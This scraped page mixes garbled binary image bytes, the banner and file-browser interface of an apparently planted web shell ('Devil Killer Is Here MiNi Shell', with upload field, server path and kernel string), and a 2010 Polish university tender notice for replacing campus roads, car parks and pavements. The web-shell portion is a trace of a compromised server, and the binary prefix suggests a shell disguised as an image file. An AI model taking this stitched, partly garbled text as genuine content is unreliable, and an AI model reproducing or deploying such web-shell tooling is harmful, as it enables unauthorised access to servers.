JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100526/134847-N-2010.html

<p class="kh_header"><b>Poznań: wykonanie wymiany nawierzchni dróg wewnętrznych, parkingów i chodników w rejonie C Uniwersytetu Przyrodniczego 
ograniczonego ulicami: Wołyńską i Wojska Polskiego w Poznaniu</b><br>
<b>Numer ogłoszenia: 134847 - 2010; data zamieszczenia: 26.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy w Poznaniu , ul. Wojska Polskiego 28, 60-637 Poznań, woj. wielkopolskie, tel. 061 8487023, 8487043, faks 061 8487043, 8487145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie wymiany nawierzchni dróg wewnętrznych, parkingów i chodników w rejonie C Uniwersytetu Przyrodniczego 
ograniczonego ulicami: Wołyńską i Wojska Polskiego w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana nawierzchni dróg wewnętrznych, parkingów i chodników w rejonie C Uniwersytetu Przyrodniczego ograniczonego ulicami: Wołyńską i Wojska Polskiego w Poznaniu.
Konstrukcja drogi dla odcinków z rozbiórką istniejącej nawierzchni: betonowa kostka brukowa o grubości 8 cm, podsypka piaskowo-cementowa o grubości 5 cm, podbudowa z kruszywa łamanego stabilizowanego mechanicznie o grubości 20 cm, warstwa odcinająca (piasku) zagęszczana mechanicznie o grubości 7 cm a dla odcinków z zachowaniem istniejącej betonowej nawierzchni:  betonowa kostka brukowa o grubości 8 cm podsypka piaskowo-cementowej gr. 5 cm, podbudowa z betonu B 7,5 o grubości 15 cm. Wzdłuż krawężnika należy wykonać ściek z betonowej kostki brukowej (szara cegiełka) o szerokości 10 cm układany na betonie. Konstrukcja chodników: betonowa kostka brukowa o grubości 6 cm, podsypka piaskowo-cementowa o grubości 5cm, warstwa piasku gr. 10 cm. Przedmiot zamówienia obejmuje również regulacje wysokości studzienek kanalizacyjnych i ulicznych kratek ściekowych, wykonanie schodów z betonowej kostki brukowej, ułożenie przepustów kablowych, wykonanie progów zwalniających z betonowej kostki brukowej, ustawienie znaków drogowych, wykonanie studzienek naświetlających przy ścianie budynku. Szczegółowo zakres robót określono w załączonych ślepych kosztorysach.
W celu łatwiejszej orientacji zakresu robót przedmiotu zamówienia oraz do przygotowania harmonogramu rzeczowo-finansowego do umowy Zamawiający podzielił na 10 odcinków. Na załączonej mapie zostały one pokazane. Zamawiający wyraźnie zaznacza, że wszystkie odcinki stanowią całość i tworzą jedno zadanie. 
Odcinek 1: od parkingu przy ul. Wołyńskiej do łuku drogi.
Sfrezować nawierzchnię asfaltową i zutylizować zgodnie z przepisami, rozebrać betonową podbudowę drogi wraz z dojazdami do szklarni i stacji trafo w budynku przy l. Wołyńskiej 33, rozebrać krawężniki (z wyjątkiem nowych przed budynkiem Wołyńska 35), zerwaną podbudowę należy skruszyć i zużyć do wykonania podbudowy, ułożyć betonową kostkę brukową na posypce piaskowo-cementowej, wykonać chodnik z betonowej kostki brukowej na podsypce piaskowej, wykonać próg zwalniający z kostki brukowej w kolorze czerwonym, wykonać przepust kablowy fi 100, wykonać regulacja wysokości studzienek i ścieków kanalizacyjnych. Niweletę drogi należy dostosować do: istniejącej nawierzchni parkingu, wejścia do szklarni, wejścia do trafo, istniejącej drogi z kostki brukowej do Collegium Maximum, chodnika przed budynkiem przy ul. Wołyńskiej 35.
Odcinek 2: od łuku drogi do parkingu przy Hali WTD.
Rozebrać krawężniki drogi, zerwane krawężniki należy skruszyć i zużyć do wykonania podbudowy na innych odcinkach, na istniejącej płycie betonowej ułożyć betonową kostkę brukową na podbudowie grubości 15 cm z betonu B 7,5 o i podsypce piaskowo-cementowej grubości 5 cm, wykonać chodnik z betonowej kostki brukowej na podsypce piaskowo-cementowej, wykonać próg zwalniający z kostki brukowej w kolorze czerwonym, regulacja wysokości studzienek i ścieków kanalizacyjnych. Niweletę drogi należy dostosować do: niwelety nawierzchni odcinka 1.
Odcinek 3: parking przy Hali WTD.
Rozebrać betonową podbudowę drogi, rozebrać krawężniki, zlikwidować trawnik,  zerwaną podbudowę należy skruszyć i zużyć do wykonania podbudowy, ułożyć betonową kostkę brukową na posypce piaskowo-cementowej, wykonać chodnik z betonowej kostki brukowej na podsypce piaskowo-cementowej, wykonać przepust kablowy oraz rurę peszla, zamontować prefabrykowane fundamenty pod lampy parkowe, regulacja wysokości studzienek rewizyjnych i drogowych kratek ściekowych, rozebrać boksy z kształtowników stalowych i siatki, wycinka i przesunięcie drzew. Niweletę drogi należy dostosować do: niwelety istniejącej drogi przy Hali WTD od wschodniej strony, wejścia do Hali WTD, niwelety odcinka 2.
Odcinek 4: droga przy Hali WTD (od strony zachodniej).
Rozebrać betonową podbudowę drogi, rozebrać krawężniki, rozebrać chodnik wraz z obrzeżami,  zerwaną podbudowę należy skruszyć i zużyć do wykonania podbudowy, ułożyć betonową kostkę brukową na posypce piaskowo-cementowej na drodze i zatoce parkingowej, wykonać chodnik z betonowej kostki brukowej na podsypce piaskowo-cementowej, wykonać przepust kablowy, regulacja wysokości studzienek rewizyjnych i ulicznych kratek ściekowych. Niweletę drogi należy dostosować do: niwelety odcinka 3, istniejącej drogi z betonowej kostki brukowej do Instytutu Inżynierii Rolniczej.
Odcinek 5: od Hali WTD do Kolegium Rungego przy ul. Wojska Polskiego.
Rozebrać betonową podbudowę drogi, rozebrać krawężniki, rozebrać chodnik,  zerwaną podbudowę należy skruszyć i zużyć do wykonania podbudowy, ułożyć betonową kostkę brukową na posypce piaskowo-cementowej na drodze, wykonać próg zwalniający, wykonać chodnik z betonowej kostki brukowej na podsypce piaskowo-cementowej, wykonać schody z betonowej kostki brukowej w kierunku kortów, wykonać betonową ściankę oporową przy głównym parkingu przy budynku WTD, zamontować prostą balustradę z rur stalowych przy głównym parkingu przy budynku WTD, wykonać metalowe słupki uniemożliwiające wjazd samochodu na chodnik, regulacja wysokości studzienek rewizyjnych i ulicznych kratek ściekowych kanalizacyjnych. Niweletę drogi należy dostosować do: niwelety odcinka 4, istniejącej drogi z betonowej kostki brukowej do Instytutu Inżynierii Rolniczej, istniejącego chodnika przy Kolegium Rungego, niwelety ulicy Wojska Polskiego.
Odcinek 6: droga i plac przed Instytutem Inżynierii Rolniczej przy ul. Wojska Polskiego 50
Rozebrać betonową podbudowę drogi i placu, rozebrać krawężniki, rozebrać chodnik,  zerwaną podbudowę należy skruszyć i zużyć do wykonania podbudowy, ułożyć betonową kostkę brukową na posypce piaskowo-cementowej na drodze, wykonać chodnik z betonowej kostki brukowej na podsypce piaskowo-cementowej wzdłuż budynku IIR, rozebrać pojazd do piwnicy przy budynku IIR, wykonać izolację pionową i studzienki naświetli, regulacja wysokości studzienek i ścieków kanalizacyjnych. Niweletę drogi należy dostosować do: niwelety ulicy Szydłowskiej, istniejącej drogi z betonowej kostki brukowej do WTD, wejść do budynku Instytutu Inżynierii Rolniczej.
Odcinek 7: droga dojazdowa i parking przed WTD przy ul. Wojska Polskiego 38/42
Rozebrać betonową podbudowę drogi i placu, rozebrać krawężniki, rozebrać chodnik,  zerwaną podbudowę należy skruszyć i zużyć do wykonania podbudowy, ułożyć betonową kostkę brukową na posypce piaskowo-cementowej na drodze, wykonać chodnik z betonowej kostki brukowej na podsypce piaskowo-cementowej, regulacja wysokości studzienek i ścieków kanalizacyjnych. Niweletę drogi należy dostosować do: niwelety odcinka 5, chodnika pod wiatą przed wejściem do WTD.
Odcinek 8: chodnik przed Collegium Maximum przy ul. Wojska Polskiego 28.
Rozebrać stopień i płytki chodnikowe przy przejściu dla pieszych przy Collegium Maximum, ułożyć betonową kostkę brukową (melanż nostalit), rozebrać chodnik wraz obrzeżami,  płytki należy skruszyć i zużyć do wykonania podbudowy na innych odcinkach, pokryć istniejące stopnie betonową kostką brukową, wykonać chodnik z betonowej kostki brukowej na podsypce piaskowo-cementowej. Niweletę chodnika należy dostosować do: istniejącego chodnika i krawężnika przy parkingu.
Odcinek 9: chodnik przy parkingu przy ul. Wołyńskiej (przy Collegium Maximum, dojście do przystanku autobusowego i świateł przy przejściu dla pieszych przez ul. Wołyńską.
Rozebrać chodnik wraz obrzeżami,  część płytek użyć do naprawy chodnika w odcinku 10, płytki należy skruszyć i zużyć do wykonania podbudowy na innych odcinkach, pokryć istniejące stopnie betonową kostką brukową, wykonać chodnik z betonowej kostki brukowej na podsypce piaskowo-cementowej. Niweletę chodnika należy dostosować do: istniejącego chodnika i krawężnika przy parkingu.
Odcinek 10: chodnik przy torach tramwajowych przy ul. Wołyńskiej.
Rozebrać chodnik wraz obrzeżami,  płytki ułożyć ponownie na podsypce piaskowej,  uszkodzone płytki wymienić na odzyskane w trakcie rozbiórki odcinku 9, osadzić na ławie betonowej krawężnik wzdłuż torów tramwajowych. Chodnik i krawężnik jest oddzielony od torowiska metalowym ogrodzeniem metrowej wysokości. Niweletę chodnika należy dostosować do: istniejącego krawężnika przy parkingu.
 Czasie prowadzenia robót należy zapewnić pracownikom i studentom dojście do budynków.
Po zakończeniu robót należy wykonać inwentaryzację geodezyjną obejmującą cały zakres robót.
Po złożeniu oferty a  przed podpisaniem umowy należy przygotować, w porozumieniu z Zamawiającym, harmonogram rzeczowo-finansowy. Należy do minimum ograniczyć brak dostępu do obiektów uczelnianych. Mimo przerwy wakacyjnej budynki będą użytkowane przez pracowników naukowych.
Ofertę należy przygotować na podstawie  Specyfikacji Istotnych Warunków Zamówienia. Szczegółowo zakres robót przedstawiono w ślepym kosztorysie. Zamawiający dopuszcza podwykonawców.  Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami prawa i sztuką budowlaną.

A. Podstawowe dane o terenie 
Na terenie, który obsługuje droga wewnętrzna znajdują się budynki: Collegium Maximum przy ul. Wojska Polskiego 28, Wydział Technologii Drewna przy ul. Wojska Polskiego 38/42, Hala WTD przy ul. Wojska Polskiego 38/42, budynek przy ul. Wołyńskiej 33, budynek przy ul. Wołyńskiej 35, Instytut Inżynierii Rolniczej budynek przy ul. Wołyńskiej 50, Pilotowa Stacja Biotechnologii przy ul. Wojska Polskiego 52, Kolegium Rungego przy ul. Wojska Polskiego 48. 

B. Komplet dokumentacji technicznej przekazywanej wykonawcom: 
1.	Ślepy kosztorys wymiany nawierzchni dróg wewnętrznych, parkingów i chodników.
2.	Mapa terenu.
3.	Specyfikacja Technicznego Wykonania i Odbioru Robót Budowlanych.
4.	Specyfikacja Istotnych Warunków Zamówienia.


C. Wymagane dokumenty techniczne:
1. Do wykonania przedmiotu zamówienia należy użyć tylko materiałów posiadających aprobaty techniczne, certyfikaty, znaki bezpieczeństwa, atesty p. poż. zgodne z wymogami obowiązującego prawa. Do odbioru końcowego należy dostarczyć ww. dokumenty oprawione i zaopatrzone w spis treści w 2 egzemplarzach. Na każde żądanie Zamawiającego Wykonawca jest zobowiązany przedstawić odpowiednie dokumenty na materiały, które ma zamiar zastosować-wbudować realizując zamówienie. 
2. Koszty związane z opracowaniem przez Wykonawcę dokumentacji powykonawczej (inwentaryzacja geodezyjna) są zawarte w wynagrodzeniu. Dokumentacja powykonawcza powinna zostać wykonana w 2 egzemplarzach. Dokumentacja ta zostanie wykonana i przekazana Zamawiającemu niezwłocznie po zakończeniu prac, nie później niż 10 dni od zakończenia prac, przed wystawieniem faktury końcowej. W przypadku usuwania wad lub dokonywania napraw gwarancyjnych Wykonawca zobowiązany będzie do przedstawienia Zamawiającemu, w terminie 7 dni od zakończenia tych czynności, zaktualizowanej dokumentacji powykonawczej, uwzględniającej wszelkie zmiany.
3. W ofercie wykonania przedmiotu zamówienia, należy ująć wszystkie koszty związane z jego wykonaniem wraz z wywozem gruzu, opłatami za wysypisko i uporządkowaniem terenu po zakończeniu budowy. Wykonawca jest zobowiązany do bieżącego utrzymywania porządku.

D. Strony uzgadniają, że do obowiązków Wykonawcy należy również: 
1.	wywóz nieczystości wraz z opłatą wysypiskową - utrzymywanie porządku na placu budowy, pozostawienie okolic obiektu w stanie nie gorszym od zastanego w momencie przekazania placu budowy; 
2.	urządzenie i zagospodarowanie placu budowy (zaplecze, place składowe, drogi montażowe);
3.	wykonanie dokumentacji powykonawczej;
4.	płatnych prób, badań, pomiarów, regulacji instalacji, odbiorów technicznych,
5.	dozorowanie budowy;
6.	korzystanie z dróg publicznych, pozostawienie ich w stanie nie gorszym od zastanego
w momencie przekazania placu budowy;
7.	stosownie do potrzeb sporządzenie dodatkowych rysunków wykonawczych;
8.	ubezpieczenie budowy na czas realizacji robót;
9.	wszelkie prace i czynności niezbędne do osiągnięcia zakładanych parametrów technicznych i przekazania do użytkowania;

Pozostałe informacje:
1.	Zamawiający sugeruje, aby potencjalni wykonawcy dokonali wizji lokalnej i zapoznali się z przyszłym terenem budowy i jego otoczeniem, a także do oszacowania na własną odpowiedzialność koszta i ryzyka wszelkich danych, jakie mogą okazać się niezbędne do przygotowania oferty i podpisania umowy. Wizyta na terenie budowy nie będzie organizowana przez Zamawiającego. Jakiekolwiek koszty związane z inspekcją terenu budowy ponoszą wykonawcy.  
2.	W przypadku pojawienia się nazw własnych materiałów - należy przyjąć, iż są to przykładowe materiały, a Zamawiający dopuszcza stosowanie materiałów równoważnych o parametrach technicznych nie gorszych niż materiały wskazane w zestawieniach.  
3.	Zamawiający dopuszcza podwykonawstwo w zakresie robót objętych przedmiotem zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.12.00-0, 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium 
w wysokości - 20.000,00  PLN (słownie: dwadzieścia tysięcy złotych) w terminie do dnia 10 czerwca 2010 r. do godz. 11:00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest doświadczenie w robotach budowlanych zbieżnych z przedmiotem zamówienia co najmniej 2 zamówień w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, o podobnym zakresie i wartości co najmniej  600.000,00 zł brutto każde.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest dysponowanie osobami zdolnymi do wykonania zamówienia:
zadysponują do wykonania zamówienia Kierownika budowy, posiadającego uprawnienia budowlane bez ograniczeń,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają opłaconą polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzenia działalności gospodarczej w zakresie robót budowlanych na kwotę nie mniejszą niż: 1.500.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Formularz ofertowy - z wykorzystaniem wzoru Zamawiającego - załącznik Nr 1 
b)	kosztorys w formie pisemnej i elektronicznej - załącznik Nr 2
c)	oświadczenie gwarancyjne Wykonawcy - wg załącznika nr 6, udzielą co najmniej:  5 lat gwarancji na przedmiot zamówienia,
d)	informacji o zakresie prac, które Wykonawca zamierza powierzyć podwykonawcy  - wg załącznika nr 7,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wydłużenia terminu realizacji przedmiotu zamówienia  w przypadku wystąpienia warunków atmosferycznych uniemożliwiających prowadzenie robót. Ciężar udowodnienia wystąpienia takich warunków spoczywa na wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poznań ul. Wojska Polskiego 28, Coll. MAximum pok. 407 - Biuro Zamówień Publicznych w godz. 10:00 do 13:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2010 godzina 11:00, miejsce: w siedzibie Zamawiającego, Uniwersytet Przyrodniczy w Poznaniu, budynek Collegium Maximum, ul. Wojska Polskiego 28 w pokoju nr 304 - Sekretariat Kanclerza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





